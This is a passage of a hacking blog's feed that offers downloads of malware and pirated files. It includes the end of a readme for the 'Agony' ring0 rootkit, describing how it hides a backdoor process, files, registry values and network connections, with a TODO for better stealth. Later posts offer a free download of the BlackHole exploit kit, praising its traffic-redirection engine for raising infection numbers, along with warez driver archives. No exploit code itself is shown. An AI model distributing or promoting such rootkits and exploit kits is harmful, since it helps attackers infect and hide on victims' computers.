- hide backdoor.exe process&lt;br /&gt;
- hide backdoor.exe file&lt;br /&gt;
- add 500Mb on C:\ volume remaining disk space&lt;br /&gt;
- hide the &quot;backdoor&quot; service&lt;br /&gt;
- hide connexions on the 88 tcp port and 5900 udp port&lt;br /&gt;
- hide launchBackdoor reg value&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2.8 stop Agony:&lt;br /&gt;
&lt;br /&gt;
to stop Agony:   agony -stop&lt;br /&gt;
This command will stop all agony activity, uninstall service, clean registry and some agony files.&lt;br /&gt;
&lt;br /&gt;
You can also stop agony with this cmdline:&lt;br /&gt;
sc delete agony (if you didn&#39;t hide the agony service).&lt;br /&gt;
then you must delete, in &quot;HKLM\\Software\\Microsoft\\Active 
Setup\\Installed Components&quot;, the following sub keys (if they exist):&lt;br /&gt;
{232f4e3f2-bab8-11d0-97b9-00c04f98bcb9}&lt;br /&gt;
{256dc5e0e-7c46-11d3-b5bf-0000f8695621}&lt;br /&gt;
&lt;br /&gt;
You can also delete the .sys file and reboot.&lt;br /&gt;
But the cleanest way is to use -stop option.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
III Next versions&lt;br /&gt;
&lt;br /&gt;
I don&#39;t think i will continue this rootkit (maybe for private releases).&lt;br /&gt;
If you find a bug in my code, you can send me a mail to &lt;a href=&quot;mailto:Intox7@gmail.com&quot; xpndit=&quot;true&quot;&gt;Intox7@gmail.com&lt;/a&gt;,&lt;br /&gt;
i&#39;ll fix it as soon as i can.&lt;br /&gt;
Those who want to continue the tool can start with my code.&lt;br /&gt;
A little TODO:&lt;br /&gt;
- find a better startup (start in SERVICE_BOOT_START or SERVICE_SYSTEM_START)&lt;br /&gt;
- hide VOLUME.INI files better (in System Volume Information, for example)&lt;br /&gt;
- options to hide objects from a specified path&lt;br /&gt;
- create a hidden directory, which size will be recalculated every X sec, to falsify space disk better&lt;br /&gt;
- etc...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
IV Greetz &amp;amp; Shoutz&lt;br /&gt;
&lt;br /&gt;
Greetz:&lt;br /&gt;
&lt;br /&gt;
Lots of people to tank, first:&lt;br /&gt;
- holy_father  : for his great hookX tuts and his good article (in phrack)&lt;br /&gt;
- i.m.weasel   : for his method to hide services&lt;br /&gt;
- jiurl        : for his article about connexion hiding&lt;br /&gt;
- greg Hoglund : for his nice tips about MDL flags&lt;br /&gt;
&lt;br /&gt;
my beta-testers:&lt;br /&gt;
karate, jhd, pikk_poket, Lord.&lt;br /&gt;
&lt;br /&gt;
And :&lt;br /&gt;
Ivanlef0u, akcom, Bigbang, Mattwood, Tolwin, ... (and a lot that i forget)&lt;br /&gt;
&lt;br /&gt;
Community:&lt;br /&gt;
- rootkit.com : really great community (80% de ma doc)&lt;br /&gt;
- osronline   : Inescapable for driver coders&lt;br /&gt;
- spiritofhack.net &amp;amp; undergroundkonnekt.net&lt;br /&gt;
&lt;br /&gt;
Thx to lucifer and Lord for the translate.&lt;br /&gt;
&lt;br /&gt;
Shoutz to: kinkey_wizard, BeRgA, P41f0x, Nelio, Del_argm0, Icingtaupe, TiTan, chti_hack, Malicia, ...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Intox   (Intox7@gmail.com)
   
  &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/4XgUT&quot; xpndit=&quot;true&quot;&gt;&lt;b&gt;DOWNLOAD&amp;nbsp; &lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/3036422635459530554/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/01/malware-sourceagony-ring0-rootkit.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/3036422635459530554'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/3036422635459530554'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/01/malware-sourceagony-ring0-rootkit.html' title='[Malware Source]Agony ring0 rootkit!'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz2eKqHQe1sRUYwGKkuY-VPolfYDEo9CUWAfUNKS0aYDdkkdJ83w354nPnzPgsbWPZn1g56gZ691r0oKGvKrPt_oiABQBJuChH7nimsimtZvaWJFWp8sMZf6JQ4lpSo3pQUG9mtH6Dc9c/s72-c/RootkitVid.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-1648335140542045393</id><published>2012-01-03T05:47:00.000-08:00</published><updated>2012-01-03T05:47:33.996-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Free Download"/><title type='text'>Windows XP Drivers (Update 28.12.2011) [English + Russian]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;Windows XP Drivers (Update 28.12.2011) [English + Russian]&quot; src=&quot;http://preview.filesonic.com/img/ab/6e/96/4989495.jpg&quot; title=&quot;Windows XP Drivers (Update 28.12.2011) [English + Russian]&quot; /&gt;&lt;/div&gt;
&lt;b&gt;Windows XP Drivers (Update 28.12.2011) [English + Russian] | 2.05 GB&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;
&lt;div align=&quot;center&quot;&gt;
A
 collection of updated drivers for devices running the operating system 
Windows XP x32/x64, is a most complete and fresh set on 28/12/2011 in 
this release contains the driver for Stationary (Desktop) and Laptop 
(Notebook) All drivers are sorted by device and packed in a self 
extracting archive 7 zip, all drivers were downloaded from the official 
websites of manufacturers and are the reference (without external 
changes.)&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Program Title:&lt;/b&gt; Windows XP Drivers&lt;br /&gt;&lt;b&gt;Version of the program:&lt;/b&gt; (Update 28.12.2011)&lt;br /&gt;&lt;b&gt;Latest version:&lt;/b&gt; (Update 28.12.2011)&lt;br /&gt;&lt;b&gt;Language:&lt;/b&gt; English, Russian&lt;br /&gt;&lt;br /&gt;&lt;b&gt;System requirements:&lt;/b&gt;&lt;br /&gt;OS: Windows XP&lt;br /&gt;CPU: Pentium 1.5 Ghz&lt;br /&gt;VIDEO: Video card capable of 32bit at 640x480&lt;br /&gt;RAM: 512 Mb&lt;br /&gt;&lt;br /&gt;&lt;b&gt;List of drivers:&lt;/b&gt;&lt;br /&gt;&lt;b&gt;(Audio)&lt;/b&gt;&lt;br /&gt;* Analog Devices SoundMAX HD Audio Windows XP Driver analog-device hd v.6.10.1.7270 - x32/x64&lt;br /&gt;* Analog Devices SoundMAX AC&#39;97 v.5.12.01.5410 - x32/x64&lt;br /&gt;* Realtek HD Audio Driver R2.66 - x32/x64&lt;br /&gt;* Realtek AC97 Audio Driver v4.06 - x32/x64&lt;br /&gt;* Realtek HDMI Audio Driver R2.39 - x32/x64&lt;br /&gt;* C-Media CM-102 Driver v.5.12.8.2118 - x32/x64&lt;br /&gt;* C-Media CM106 v.2131-2111 - x32/x64&lt;br /&gt;* C-Media CM6501 v.6.12.8.2151 - x32/x64&lt;br /&gt;* C-Media CM8738 v.8.17.34-x32/x64&lt;br /&gt;* C-Media CM8768 v.8.17.33-x32/x64&lt;br /&gt;* C-Media CM8770 v.8.17.33-x32/x64&lt;br /&gt;* C-Media CM8787 v.8.17.47-x32/x64&lt;br /&gt;* C-Media CM8788 v.6.12.8.1772 - x32/x64&lt;br /&gt;* C-Media CMI9880L Driver v.5.12.01.0008 - x32&lt;br /&gt;* C-Media CMI9880L Driver v.5.12.1.9 - x64&lt;br /&gt;* Conexant Hermosa HD Audio Windows XP Driver v.4.36.6.0 - x32/x64&lt;br /&gt;* Conexant HD Audio Driver v.3.73.0.50 - x32/x64&lt;br /&gt;* Conexant Cocoa II HD Audio Driver v.3.80.0.51 - x32/x64&lt;br /&gt;* SigmaTel Audio STAC92xx Driver v.6.10.6207.2 - x32/x64&lt;br /&gt;* VIA HD Audio Driver v.6.0.01.9800c - x32/x64&lt;br /&gt;&lt;br /&gt;&lt;b&gt;(Video)&lt;/b&gt;&lt;br /&gt;* AMD / ATI Catalyst 11.12 Desktop WHQL x32&lt;br /&gt;* AMD / ATI Catalyst 11.12 Desktop WHQL x64&lt;br /&gt;* AMD / ATI Catalyst 9.3 Notebook WHQL x32&lt;br /&gt;* Intel Graphics Driver&lt;br /&gt;- V.14.38.3 - x32/x64&lt;br /&gt;* Intel Graphics Driver (B43, G41, G43, G45, Q43, Q45, GL40, GM45, GS45, GS40) - v.14.42.11 - x32/x64&lt;br /&gt;* Intel Graphics Media Accelerator v.14.46.8 - x32/x64&lt;br /&gt;* Nvidia 285.58 Desktop WHQL - x32&lt;br /&gt;* Nvidia 285.58 Desktop WHQL - x64&lt;br /&gt;* Nvidia 266.58 Notebook WHQL - x32&lt;br /&gt;* Nvidia 266.58 Notebook WHQL - x64&lt;br /&gt;* VIA CN896 VIA Chrome9 ™, P4M900 VIA Chrome9 ™, VN896 VIA Chrome9 ™ HC v.20.50.01a - x32/x64&lt;br /&gt;* VIA VX800 VIA Chrome9 ™ HC, VX820/UT VIA Chrome9 ™ HC v.20.12.01a - x32/x64&lt;br /&gt;* VIA VX855 VIA Chrome9 ™ HCM, VX875 VIA Chrome9 ™ HCM v.24.10.01q - x32/x64&lt;br /&gt;* SiS Video Driver UniVGA v.3.93 - x32/x64&lt;br /&gt;&lt;br /&gt;&lt;b&gt;(Chipset)&lt;/b&gt;&lt;br /&gt;* Intel Chipset Driver v.9.2.3.1022 - x32/x64&lt;br /&gt;* Intel AMT / MEI / HECI Driver v.7.0.2.1164 - x32/x64&lt;br /&gt;* Intel Management Engine Interface Driver v.7.1.14.1107 - x32/64&lt;br /&gt;* NVIDIA nForce Windows 7 Driver v.15.45 - x32&lt;br /&gt;* NVIDIA nForce Windows 7 Driver v.15.45 - x64&lt;br /&gt;* VIA Hyperion Chipset Driver 5.24a - x32/x64&lt;br /&gt;&lt;br /&gt;&lt;b&gt;LAN (Network)&lt;/b&gt;&lt;br /&gt;* Atheros (AR8121/AR8113/AR8114/AR8131/AR8132) v.1.0.0.49 - x32/x64&lt;br /&gt;* Atheros (AR813x, AR815x) Driver v.2.0.4.4 - x32/x64&lt;br /&gt;* Atheros (L1 Gigabit Ethernet 10/100/1000 Base-T Controller) v.2.4.7.14 - x32/x64&lt;br /&gt;* Broadcom BCM57xx Ethernet Driver v.14.8.0.5 - x32/x64&lt;br /&gt;* Intel PRO/10/1000 (PRO/10GbE) Ethernet Driver v.16.7 - x32/x64&lt;br /&gt;* JMicron 2xx Ethernet Driver v.6.0.33.3 - x32/x64&lt;br /&gt;* Marvell Yukon Gigabit Ethernet Driver v.11.45.1.3 - x32/x64&lt;br /&gt;* Realtek Ethernet Windows XP Driver v.5.790.0916 - x32/x64&lt;br /&gt;* VIA Rhine Ethernet Driver v.3.87a - x32/x64&lt;br /&gt;* VIA Velocity Ethernet Driver v.1.71a - x32/x64&lt;br /&gt;&lt;br /&gt;&lt;b&gt;(Card Reader)&lt;/b&gt;&lt;br /&gt;* Alcor Micro Card Reader Driver v.1.7.16.0 - x32/x64&lt;br /&gt;* JMicron JMB38x Driver v.1.00.63 - x32/x64&lt;br /&gt;*
 O2Micro Memory Stick Reader Driver (OZ6933, OZ711E0, OZ711EC1, OZ711E1,
 OZ711E2, OZ711M1, OZ711M2, OZ711M3) - v.3.19.1 - x32/x64&lt;br /&gt;* Realtek (RTS five thousand one hundred twenty-one, 5101, 5111, 5116 Card Reader) v.6.1.7600.30127 - x32/x64&lt;br /&gt;* Realtek (RTS five thousand one hundred and fifty-eight Card Reader) v.6.0.6000.83 - x32/x64&lt;br /&gt;* Realtek (RTS five thousand one hundred and fifty-nine Card Reader) v.6.0.6000.20136 - x32/x64&lt;br /&gt;* Realtek (RTS 5 208 Card Reader) v.6.1.7601.85 - x32/x64&lt;br /&gt;* Realtek (RTS 5139 Card Reader) v.6.1.7600.10001 - x32/x64&lt;br /&gt;* Ricoh R5C83x/84x Driver v.2.14.00.05 - x32/x64&lt;br /&gt;* Ricoh R5U23x/24x Driver v.2.15.17.02 - x32/x64&lt;br /&gt;&lt;br /&gt;&lt;b&gt;(Wi-Fi)&lt;/b&gt;&lt;br /&gt;* Atheros AR50XX Wireless Windows 7 Driver v.9.2.0.427 - x32/x64&lt;br /&gt;* Broadcom Wireless BCM43xx Windows 7 Driver v.5.100.9.142-x32/x64&lt;br /&gt;* Intel Wi-Fi Windows XP Driver v.14.2.0.10 - x32/x64&lt;br /&gt;* Realtek RTL8187S, RTL8191SE Wireless LAN v.6.9110 - x32/x64&lt;br /&gt;* Realtek RTL8180, RTL8185 Wireless LAN v 6.1122.1016. - X32/x64&lt;br /&gt;* Realtek RTL8187B Wireless LAN v.6.1163.62.1182 - x32/x64&lt;br /&gt;* Realtek RTL8187L Wireless LAN v.5.1313 - x32/x64&lt;br /&gt;* Realtek RTL8190, RTL8192E Wireless LAN v.6.1682.0.1222 - x32/x64&lt;br /&gt;* Realtek RTL8191SE, RTL8192SE Wireless LAN v.1094.3.0819 - x32/x64&lt;br /&gt;* Realtek RTL8192CE, RTL8191CE, RTL8188CE Driver v.1005.28.1006 - x32/64&lt;br /&gt;* Realtek RTL81xxSU, RTL8712 Driver v.1084.44.1104 - x32/x64&lt;br /&gt;* Realtek RTL8188CU, RTL8192CU Driver v.1012.1.1231 - x32/x64&lt;br /&gt;
&lt;br /&gt;
Torrent &lt;a href=&quot;http://h33t.com/download.php?id=012e74a796da52ae79336b9f8e3a01bbbc288fc8&amp;amp;f=Windows+XP+Drivers+x32-x64+EngRus+%2823.06.2011%29%7Bh33t%7D%7Bmad+dog%7D.torrent&quot; xpndit=&quot;true&quot;&gt;Link&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;b&gt;Free DownLoad All Links With&lt;/b&gt;  &lt;br /&gt;&lt;i&gt;(FileSonic.com)&lt;/i&gt;&lt;br /&gt;
&lt;div class=&quot;scriptcode&quot;&gt;
&lt;br /&gt;http://www.filesonic.com/file/gfUXBFC/DriversXP.28.12.2011.part1.rar&lt;br /&gt;http://www.filesonic.com/file/jCfhdWn/DriversXP.28.12.2011.part1_2.rar&lt;br /&gt;http://www.filesonic.com/file/cmezgkV/DriversXP.28.12.2011.part2.rar&lt;br /&gt;http://www.filesonic.com/file/w6bpEkV/DriversXP.28.12.2011.part2_2.rar&lt;br /&gt;http://www.filesonic.com/file/sy1N6pB/DriversXP.28.12.2011.part3.rar&lt;br /&gt;http://www.filesonic.com/file/irYjvq5/DriversXP.28.12.2011.part3_2.rar&lt;br /&gt;http://www.filesonic.com/file/zQ9y5sA/DriversXP.28.12.2011.part4.rar&lt;br /&gt;http://www.filesonic.com/file/zQ9yJlX/DriversXP.28.12.2011.part4_2.rar&lt;br /&gt;http://www.filesonic.com/file/Kk9a8hA/DriversXP.28.12.2011.part5.rar&lt;br /&gt;http://www.filesonic.com/file/WJPsiCW/DriversXP.28.12.2011.part5_2.rar&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Free DownLoad All Links With&lt;/b&gt;  &lt;br /&gt;&lt;i&gt;(FileJungle.com)&lt;/i&gt;&lt;br /&gt;&lt;div class=&quot;scriptcode&quot;&gt;
&lt;br /&gt;http://www.filejungle.com/f/8d63Ae/DriversXP.28.12.2011.part1.rar&lt;br /&gt;http://www.filejungle.com/f/wYYYXQ/DriversXP.28.12.2011.part1.rar&lt;br /&gt;http://www.filejungle.com/f/d57sUV/DriversXP.28.12.2011.part2.rar&lt;br /&gt;http://www.filejungle.com/f/Z5bJpC/DriversXP.28.12.2011.part2.rar&lt;br /&gt;http://www.filejungle.com/f/hzq5cD/DriversXP.28.12.2011.part3.rar&lt;br /&gt;http://www.filejungle.com/f/FVmP4F/DriversXP.28.12.2011.part3.rar&lt;br /&gt;http://www.filejungle.com/f/qMv44M/DriversXP.28.12.2011.part4.rar&lt;br /&gt;http://www.filejungle.com/f/EqzqdH/DriversXP.28.12.2011.part4.rar&lt;br /&gt;http://www.filejungle.com/f/JvjEHm/DriversXP.28.12.2011.part5.rar&lt;br /&gt;http://www.filejungle.com/f/4uEFhE/DriversXP.28.12.2011.part5.rar&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Free DownLoad All Links With&lt;/b&gt;  &lt;br /&gt;&lt;i&gt;(Uploaded.to)&lt;/i&gt;&lt;br /&gt;&lt;div class=&quot;scriptcode&quot;&gt;
&lt;br /&gt;http://ul.to/x8im02tv/DriversXP.28.12.2011.part4_2.rar&lt;br /&gt;http://ul.to/vtaevxni/DriversXP.28.12.2011.part5_2.rar&lt;br /&gt;http://ul.to/nijxndrn/DriversXP.28.12.2011.part3_2.rar&lt;br /&gt;http://ul.to/vymxe205/DriversXP.28.12.2011.part2_2.rar&lt;br /&gt;http://ul.to/tbzto1o3/DriversXP.28.12.2011.part1_2.rar&lt;br /&gt;http://ul.to/arkhagfj/DriversXP.28.12.2011.part4.rar&lt;br /&gt;http://ul.to/i8uacxcz/DriversXP.28.12.2011.part5.rar&lt;br /&gt;http://ul.to/v6nfh525/DriversXP.28.12.2011.part2.rar&lt;br /&gt;http://ul.to/ibau9jun/DriversXP.28.12.2011.part3.rar&lt;br /&gt;http://ul.to/4ckza2vp/DriversXP.28.12.2011.part1.rar&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Free DownLoad All Links With&lt;/b&gt;  &lt;br /&gt;&lt;i&gt;(UploadStation)&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;http://www.uploadstation.com/file/X5PzTVs/DriversXP.28.12.2011.part1.rar&lt;br /&gt;http://www.uploadstation.com/file/JAbse69/DriversXP.28.12.2011.part1.rar&lt;br /&gt;http://www.uploadstation.com/file/j3FEgT7/DriversXP.28.12.2011.part3.rar&lt;br /&gt;http://www.uploadstation.com/file/GS8MeFn/DriversXP.28.12.2011.part4.rar&lt;br /&gt;http://www.uploadstation.com/file/PhXcwTW/DriversXP.28.12.2011.part4.rar&lt;br /&gt;http://www.uploadstation.com/file/aHhbW3T/DriversXP.28.12.2011.part2.rar&lt;br /&gt;http://www.uploadstation.com/file/9PbkABb/DriversXP.28.12.2011.part3.rar&lt;br /&gt;http://www.uploadstation.com/file/W8r7X5e/DriversXP.28.12.2011.part2.rar&lt;br /&gt;http://www.uploadstation.com/file/3sTxM9N/DriversXP.28.12.2011.part5.rar&lt;br /&gt;http://www.uploadstation.com/file/UH4utRb/DriversXP.28.12.2011.part5.rar&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/1648335140542045393/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/01/windows-xp-drivers-update-28122011.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/1648335140542045393'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/1648335140542045393'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/01/windows-xp-drivers-update-28122011.html' title='Windows XP Drivers (Update 28.12.2011) [English + Russian]'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-834500666373275429</id><published>2011-12-24T05:15:00.000-08:00</published><updated>2011-12-24T05:29:11.775-08:00</updated><title type='text'>[SOURCE CODE] Crypo.com Free Download!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCQJqjI29Y584fUQEi98D761j4Ka6LjkgXgXl0aZ-ASVrUwMius9ENQUqpCpjcIwARpgcRT81WhjxEE-avAb6WgSI_Z9FCfb9uYfO9EzlYQyZSVKDvqXeu1uE4OjxG8qNwJ4fCovlEWIk/s1600/crypo_source_code.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot; xpndit=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;388&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCQJqjI29Y584fUQEi98D761j4Ka6LjkgXgXl0aZ-ASVrUwMius9ENQUqpCpjcIwARpgcRT81WhjxEE-avAb6WgSI_Z9FCfb9uYfO9EzlYQyZSVKDvqXeu1uE4OjxG8qNwJ4fCovlEWIk/s640/crypo_source_code.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
The Source Code of &lt;b&gt;Crypo.com&lt;/b&gt; , One of the Famous&amp;nbsp;Free Online Encryption Service is now available to download form a File sharing website.
 This Script will encrypt your messages using a strong encryption 
algorithm, and then your information will be secure for sending.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://adf.ly/4NbOs&quot; rel=&quot;follow&quot; xpndit=&quot;true&quot;&gt;Download Here&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/834500666373275429/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/source-code-crypocom-free-download.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/834500666373275429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/834500666373275429'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/source-code-crypocom-free-download.html' title='[SOURCE CODE] Crypo.com Free Download!'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCQJqjI29Y584fUQEi98D761j4Ka6LjkgXgXl0aZ-ASVrUwMius9ENQUqpCpjcIwARpgcRT81WhjxEE-avAb6WgSI_Z9FCfb9uYfO9EzlYQyZSVKDvqXeu1uE4OjxG8qNwJ4fCovlEWIk/s72-c/crypo_source_code.png" height="72" width="72"/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-4771417349352470924</id><published>2011-12-24T05:02:00.000-08:00</published><updated>2011-12-29T05:31:02.188-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><title type='text'>BlackHole Exploit Kit 1.0.2 -  Free Download!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
First Public Release of BlackHole Exploit Kit. BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit.

&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/_bCYQxIvMQ2U/Tdn23mOZamI/AAAAAAAACAY/N5u_KmhcMf8/image_1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot; xpndit=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;296&quot; src=&quot;http://4.bp.blogspot.com/_bCYQxIvMQ2U/Tdn23mOZamI/AAAAAAAACAY/N5u_KmhcMf8/image_1.jpg&quot; width=&quot;497&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Black Market Cost :
Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author’s servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 week, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But Now its FREE HERE !


Feature :
One highly touted feature of BlackHole toolkit is its TDS or Traffic Direction Script. While this is not an entirely new concept in attack toolkits the TDS included her is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that allows redirection of traffic through a set of rules. For example, a user can set up a set of rules that redirect flow to different landing pages on their domain. These rules could be based on operating system, browser, country of origin, exploit, files, etc. One rule might redirect traffic to page A for all users that are running Windows OS from XP to Vista and running IE 8, while another rule can redirect Windows 7 users to page B. Those were just simple example rules. More advanced rules could set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole even goes the extra step and allows you to create traffic flows based on these rules and provides management interface for the flows. A savvy malicious user with a lot of experience could easily utilize this rule engine to increase their infection numbers.From a web application standpoint BlackHole is built just like other kits, consisting of a PHP and MySQL backend. Since the majority of web servers run on the LAMP stack this enabled for very easy application deployment. The user interface for this kit is a cut about the rest, and it definitely looks nicer than almost any other attack kit we’ve analyzed. It resembles some of the best legitimate web apps we see in the world of commercial software.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.multiupload.com/ZTZPEA9L5Y&quot; xpndit=&quot;true&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Credit: Hack News&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/4771417349352470924/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2011/12/blackhole-exploit-kit-102-free-download.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/4771417349352470924'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/4771417349352470924'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2011/12/blackhole-exploit-kit-102-free-download.html' title='BlackHole Exploit Kit 1.0.2 -  Free Download!'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_bCYQxIvMQ2U/Tdn23mOZamI/AAAAAAAACAY/N5u_KmhcMf8/s72-c/image_1.jpg" height="72" width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-8514883301902994563</id><published>2011-12-20T06:44:00.000-08:00</published><updated>2011-12-20T06:44:42.336-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="ebooks"/><category scheme="http://www.blogger.com/atom/ns#" term="Linux"/><title type='text'>Linux Complete Ebooks Collection</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
